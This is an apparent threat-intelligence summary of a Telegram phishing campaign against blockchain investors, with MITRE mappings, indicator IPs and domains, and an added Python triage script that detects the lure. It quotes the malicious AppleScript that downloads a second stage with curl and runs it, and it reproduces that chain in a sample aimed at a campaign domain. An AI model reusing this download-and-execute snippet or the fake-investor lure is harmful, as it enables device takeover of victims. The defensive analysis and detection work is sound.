Hunt tracks an ongoing, sophisticated phishing campaign targeting Telegram groups in the blockchain and angel-investing communities, in which actors pose as investment representatives to lure victims into downloading a malicious AppleScript. The activity shows Lazarus Group-like patterns and infrastructure, though attribution remains unconfirmed. #LazarusGroup #SignumCapital #Telegram #AppleScript
Keypoints
- The campaign targets blockchain and angel-investing entrepreneurs on Telegram, using social engineering to build trust.
- Attackers impersonate a venture-capital representative (false Telegram profile) to initiate contact and schedule discussions.
- Victims are guided to download a malicious AppleScript after the attacker raises a purported problem with joining the scheduled meeting.
- The AppleScript shells out to curl to download a second-stage script and executes it, giving the attackers control of the victim's device.
MITRE Techniques
- [T1566.003] Spearphishing via Service – The attacker contacts victims through Telegram, posing as an investor to initiate a meeting. Quote: “communication begins with the actor posing as a representative of an investment company seeking business opportunities.”
- [T1036] Masquerading – The attacker creates a false Telegram profile posing as a “GP” or general partner of the firm to discuss collaboration. Quote: “the attacker(s) created a false Telegram profile posing as a “GP” or general partner of the firm looking to discuss a potential project to collaborate on with the victim.”
- [T1059.004] Unix Shell – The AppleScript uses `do shell script` to fetch a script with curl (`-L` follows redirects, `-k` disables TLS certificate validation) and then executes the fetched text with `run script`. Quote (reconstructed from the garbled extraction; the URL is elided in the source): `# Troubleshoot the issue`, `set fix_url to …`, `set sc to do shell script "curl -L -k \"" & fix_url & "\""`, `run script sc`.
- [T1204.002] User Execution – The victim is coaxed into downloading an Apple Script thought to fix access; the script is malicious. Quote: “The script, however, is malicious and designed to allow the hackers to compromise the victim’s device.”
- [T1105] Ingress Tool Transfer – The second-stage script is pulled from attacker-controlled infrastructure over HTTPS and executed on the host, which is how the operators gain control of the victim's device. Quote: “The script, however, is malicious and designed to allow the hackers to compromise the victim’s device.”
Indicators of Compromise
- [IP Address] context – 104.168.163.149, 104.168.137.21, 104.168.163.124, 23.254.129.6 – these addresses host domains observed in the campaign infrastructure (e.g., support.internal-meeting.site, meet.cryptowave.capital).
- [Domain] context – support.internal-meeting.site, meet.cryptowave.capital – domains associated with the campaign’s phishing infrastructure, linked to the IPs above through TLS certificate history pivoting.
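The following is an added triage script, not Hunt's code or anything from the campaign: it statically scans AppleScript source for the fetch-and-run chain quoted under T1059.004 (a `do shell script` that runs curl, followed by `run script` on the result, or a curl piped into a shell) and checks any embedded URL host against the domains and IPs listed under Indicators of Compromise. Both sample scripts are constructed for the example; the path `/fix.scpt` in the malicious one is an assumption, and the function and variable names are mine.

```python
"""Static triage of AppleScript source for the download-then-execute pattern
(do shell script "curl -L -k ..." followed by run script on the result) and
a check of embedded URL hosts against the IoCs on this page.
Added example, not Hunt's code. The sample scripts below are constructed."""
import re
from urllib.parse import urlparse

# IoCs exactly as listed on this page.
IOC_DOMAINS = {"support.internal-meeting.site", "meet.cryptowave.capital"}
IOC_IPS = {"104.168.163.149", "104.168.137.21", "104.168.163.124", "23.254.129.6"}

# Constructed sample shaped like the quoted snippet (the /fix.scpt path is assumed).
MALICIOUS_SAMPLE = '''
# Troubleshoot the issue
set fix_url to "https://support.internal-meeting.site/fix.scpt"
set sc to do shell script "curl -L -k \\"" & fix_url & "\\""
run script sc
'''

# Constructed benign sample: shells out, but never executes anything it fetched.
BENIGN_SAMPLE = '''
set today to do shell script "date +%Y-%m-%d"
display dialog "Today is " & today
'''

# AppleScript string literal following 'do shell script', honouring \" escapes.
DO_SHELL_RE = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"', re.I)
SET_FROM_SHELL_RE = re.compile(r'\bset\s+(\w+)\s+to\s+do shell script', re.I)
RUN_SCRIPT_RE = re.compile(r'\brun script\s+(\w+)', re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
FETCH_RE = re.compile(r'\b(curl|wget)\b', re.I)
INSECURE_TLS_RE = re.compile(r'(^|\s)(-k|--insecure)(\s|$)')
PIPE_TO_SH_RE = re.compile(r'\|\s*(ba|z)?sh\b')


def ioc_hits(urls):
    """Return the set of URL hosts matching a listed IP, domain or subdomain."""
    hits = set()
    for url in urls:
        host = (urlparse(url).hostname or "").lower()
        if host in IOC_IPS or host in IOC_DOMAINS:
            hits.add(host)
        elif any(host.endswith("." + d) for d in IOC_DOMAINS):
            hits.add(host)
    return hits


def triage(script_text):
    """Score one AppleScript source for the fetch-and-execute chain."""
    shell_cmds = [m.group(1) for m in DO_SHELL_RE.finditer(script_text)]
    fetches = [c for c in shell_cmds if FETCH_RE.search(c)]
    insecure = [c for c in fetches if INSECURE_TLS_RE.search(c)]
    piped = [c for c in fetches if PIPE_TO_SH_RE.search(c)]
    # 'run script X' where X holds the output of 'do shell script': the fetched
    # body is executed as AppleScript, which is exactly the quoted sample's trick.
    from_shell = set(SET_FROM_SHELL_RE.findall(script_text))
    executed = [v for v in RUN_SCRIPT_RE.findall(script_text) if v in from_shell]
    urls = URL_RE.findall(script_text)
    return {
        "shell_commands": shell_cmds,
        "fetches": fetches,
        "insecure_tls": insecure,
        "pipe_to_shell": piped,
        "executes_fetched": executed,
        "urls": urls,
        "ioc_hits": ioc_hits(urls),
        # Fetching and then executing what was fetched is the signal; -k and an
        # IoC host only raise confidence, so they are reported but not required.
        "suspicious": bool(fetches and (executed or piped)),
    }


if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, triage(sample))
```

The verdict deliberately keys on the chain (a shell-out that fetches, plus execution of the fetched content) rather than on the IoC hosts alone, so the check still fires when the operators rotate infrastructure; the `-k` flag and an IoC match are surfaced as corroborating fields. Run it over any `.applescript` or decompiled `.scpt` text recovered from a victim's Downloads folder.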
Read more: https://hunt.io/blog/suspected-north-korean-hackers-target-blockchain-community-via-telegram